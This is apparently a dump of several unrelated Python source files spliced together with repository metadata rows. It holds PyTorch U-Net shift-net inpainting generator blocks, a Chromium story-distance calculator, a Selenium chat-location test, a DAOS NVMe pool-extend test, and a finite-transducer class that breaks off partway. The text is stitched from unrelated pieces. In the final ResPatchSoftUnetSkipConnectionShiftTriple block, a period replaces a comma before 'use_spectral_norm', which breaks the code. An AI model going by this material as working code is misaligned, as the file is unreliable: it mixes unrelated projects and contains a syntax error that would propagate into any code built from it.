kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Res Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class ResUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(ResUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = ResUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class ResUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(ResUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerResShiftTriple(inner_nc, opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# Res shift differs with other shift here. It is `*2` not `*3`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Soft pixel shift #####################################
################################### *************************** #####################################
class SoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(SoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = SoftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class SoftUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_spectral_norm=False, layer_to_last=3):
super(SoftUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerSoftShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### patch soft shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class PatchSoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(PatchSoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = PatchSoftUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class PatchSoftUnetSkipConnectionShiftTriple(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(PatchSoftUnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerPatchSoftShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, opt.fuse, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Res patch soft shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class ResPatchSoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(ResPatchSoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = ResPatchSoftUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class ResPatchSoftUnetSkipConnectionShiftTriple(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(ResPatchSoftUnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerResPatchSoftShiftTriple(inner_nc, opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, opt.fuse, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# Res shift differs with other shift here. It is `*2` not `*3`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1). use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
| 54.62543
| 175
| 0.572157
|
54b0ec65bf9dd231312d4d73918ce870ff9e22b4
| 2,270
|
py
|
Python
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 113
|
2015-05-04T09:58:14.000Z
|
2022-01-31T19:35:03.000Z
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from core.external_modules import pandas
HIGHEST_VALID_NAN_RATIO = 0.5
def CalculateDistances(
input_dataframe,
metric,
normalize=False,
output_path=None):
"""Calculates the distances of stories.
If normalize flag is set the values are first normalized using min-max
normalization. Then the similarity measure between every two stories is
calculated using pearson correlation.
Args:
input_dataframe: A dataframe containing a list of records
having (test_case, commit_pos, bot, value).
metric: String containing name of the metric.
normalize: A flag to determine if normalization is needed.
output_path: Path to write the calculated distances.
Returns:
A dataframe containing the distance matrix of the stories.
"""
input_by_story = input_dataframe.groupby('test_case')['value']
total_values_per_story = input_by_story.size()
nan_values_per_story = input_by_story.apply(lambda s: s.isna().sum())
should_keep = nan_values_per_story < (
total_values_per_story * HIGHEST_VALID_NAN_RATIO)
valid_stories = total_values_per_story[should_keep].index
filtered_dataframe = input_dataframe[
input_dataframe['test_case'].isin(valid_stories)]
temp_df = filtered_dataframe.copy()
if normalize:
# Min Max normalization
grouped = temp_df.groupby(['bot', 'test_case'])['value']
min_value = grouped.transform('min')
max_value = grouped.transform('max')
temp_df['value'] = temp_df['value'] / (1 + max_value - min_value)
distances = pandas.DataFrame()
grouped_temp = temp_df.groupby(temp_df['bot'])
for _, group in grouped_temp:
sample_df = group.pivot(index='commit_pos', columns='test_case',
values='value')
if distances.empty:
distances = 1 - sample_df.corr(method='pearson')
else:
distances = distances.add(1 - sample_df.corr(method='pearson'),
fill_value=0)
if output_path is not None:
if not os.path.isdir(output_path):
os.makedirs(output_path)
distances.to_csv(
os.path.join(output_path, metric + '_distances.csv')
)
return distances
| 31.527778
| 73
| 0.730837
|
293283969ca712299812e4876596c140604d7076
| 1,898
|
py
|
Python
|
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
pass
if __name__ == '__main__':
main(sys.argv)
import setup
from selenium.webdriver.common.by import By
driver = setup.MakeDriver(user="moldavi")
if driver.is_mobile:
# Moldavi shares his location
driver.DrawerMenuClick('mobile-main-page', 'Global Chat')
driver.Click([[By.TAG_NAME, 'ghvz-chat-location'], [By.TAG_NAME, 'paper-icon-button']])
driver.RetryUntil(
lambda : True,
lambda: driver.FindElement([[By.NAME, 'map-ready']]))
driver.Click([[By.ID, 'sendLocationForm'], [By.ID, 'done']])
# NOTE: don't blindly copy this, it's very risky to use FindElement's return value.
location = driver.FindElement([[By.NAME, 'message-Global Chat-'], [By.ID, 'mapContainer']])
location = location.get_attribute('src')
assert "https://maps.googleapis.com/maps/api/staticmap" in location;
# Jack can see it
driver.SwitchUser('jack')
driver.DrawerMenuClick('mobile-main-page', 'Global Chat')
# NOTE: don't blindly copy this, it's very risky to use FindElement's return value.
location = driver.FindElement([[By.NAME, 'message-Global Chat-'], [By.ID, 'mapContainer']])
location = location.get_attribute('src')
assert "https://maps.googleapis.com/maps/api/staticmap" in location;
driver.Quit()
| 34.509091
| 93
| 0.721812
|
45e533457e46ae262573048136e4c016fa8a386f
| 5,496
|
py
|
Python
|
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | 2
|
2021-07-14T12:21:50.000Z
|
2021-07-14T12:21:52.000Z
|
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | 1
|
2021-11-03T05:00:42.000Z
|
2021-11-03T05:00:42.000Z
|
#!/usr/bin/python3
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import TestPool
from osa_utils import OSAUtils
from write_host_file import write_host_file
from dmg_utils import check_system_query_status
from apricot import skipForTicket
class NvmePoolExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
NVME Pool Extend test cases.
- Start the few daos servers.
- Create a pool
- Run IOR with write mode
- Start a new server and extend the pool
- Verify IOR written data after extending the pool.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = self.get_daos_command()
self.ior_test_sequence = self.params.get("ior_test_sequence",
'/run/ior/iorflags/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
def run_nvme_pool_extend(self, num_pool, oclass=None):
"""Run Pool Extend
Args:
num_pool (int) : total pools to create for testing purposes.
oclass (str) : object class (eg: RP_2G8,etc)
Defaults to None.
"""
pool = {}
total_servers = len(self.hostlist_servers) * 2
self.log.info("Total Daos Servers (Initial): %d", total_servers)
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
for val in range(0, num_pool):
# Create a pool
pool[val] = TestPool(self.context, dmg_command=self.dmg_command)
pool[val].get_params(self)
pool[val].create()
pool[val].set_property("reclaim", "disabled")
# On each pool (max 3), extend the ranks
# eg: ranks : 4,5 ; 6,7; 8,9.
for val in range(0, num_pool):
self.pool = pool[val]
test = self.ior_test_sequence[val]
threads = []
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test}))
# Launch the IOR threads
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
# Start the additional servers and extend the pool
if val == 0:
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
# Check the system map extra servers are in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One/More servers status not correct")
else:
break
self.log.info("Pool Version at the beginning %s", pver_begin)
# Extend ranks (4,5), (6,7), (8,9)
ranks_extended = "{},{}".format((val * 2) + 4, (val * 2) + 5)
output = self.dmg_command.pool_extend(self.pool.uuid,
ranks_extended)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
# Check pool version incremented after pool extend
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
# Verify the data after pool extend
self.run_ior_thread("Read", oclass, test)
# Get the pool space at the end of the test
display_string = "Pool{} space at the End".format(val)
self.pool.display_pool_daos_space(display_string)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195")
def test_nvme_pool_extend(self):
"""Test ID: DAOS-2086
Test Description: NVME Pool Extend
:avocado: tags=all,full_regression
:avocado: tags=hw,large
:avocado: tags=nvme,checksum,nvme_osa
:avocado: tags=nvme_pool_extend
"""
self.run_nvme_pool_extend(3)
| 40.711111
| 76
| 0.562955
|
3d8ce35a772bc2cf07a117f030588c75f13ae519
| 5,083
|
py
|
Python
|
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import collections
def strip_comments(file):
"""Remove comments. Everything from // to the end of the line is
considered a comment."""
for line in file:
try:
i = line.index("//")
line = line[:i]
except ValueError:
pass
yield line.strip()
class NFT(object):
"""Nondeterministic finite automaton."""
# This creates a mini-subclass NFT.Transition with three attributes
Transition = collections.namedtuple('Transition', ['q', 'a', 'b', 'r'])
# Special name for empty string
EPSILON = '&'
def __init__(self):
self.states = set() # States
self.start = None # Start state
self.accept = set() # Accept states
self.transitions = set() # Transitions
self.transitions_from = {} # Transitions indexed by q
self.transitions_on = {} # Transitions indexed by a
def set_start(self, q):
"""Set the start state."""
self.states.add(int(q))
self.start = int(q)
def add_accept(self, q):
"""Add an accept state."""
self.states.add(int(q))
self.accept.add(int(q))
def add(self, t):
"""Add a transition (of type NFT.Transition)."""
self.states.update([int(t.q), int(t.r)])
self.transitions.add(t)
self.transitions_from.setdefault(t.q, set()).add(t)
self.transitions_on.setdefault(t.a, set()).add(t)
def add_transition(self, q, a, b, r):
"""Add a transition (specified by a 'from' state, a symbol, and a 'to'
state)."""
self.add(self.Transition(int(q), a, b, int(r)))
@classmethod
def read(cls, file):
"""Read a NFT from a file."""
f = strip_comments(file)
m = cls()
# Internally, we renumber all the states. This is not so good
# for readability but is sometimes more convenient.
states = next(f).split()
state_index = {q:i for (i,q) in enumerate(states)}
_ = next(f) # ignore alphabet
m.set_start(state_index[next(f)])
for q in next(f).split(): m.add_accept(state_index[q])
for line in f:
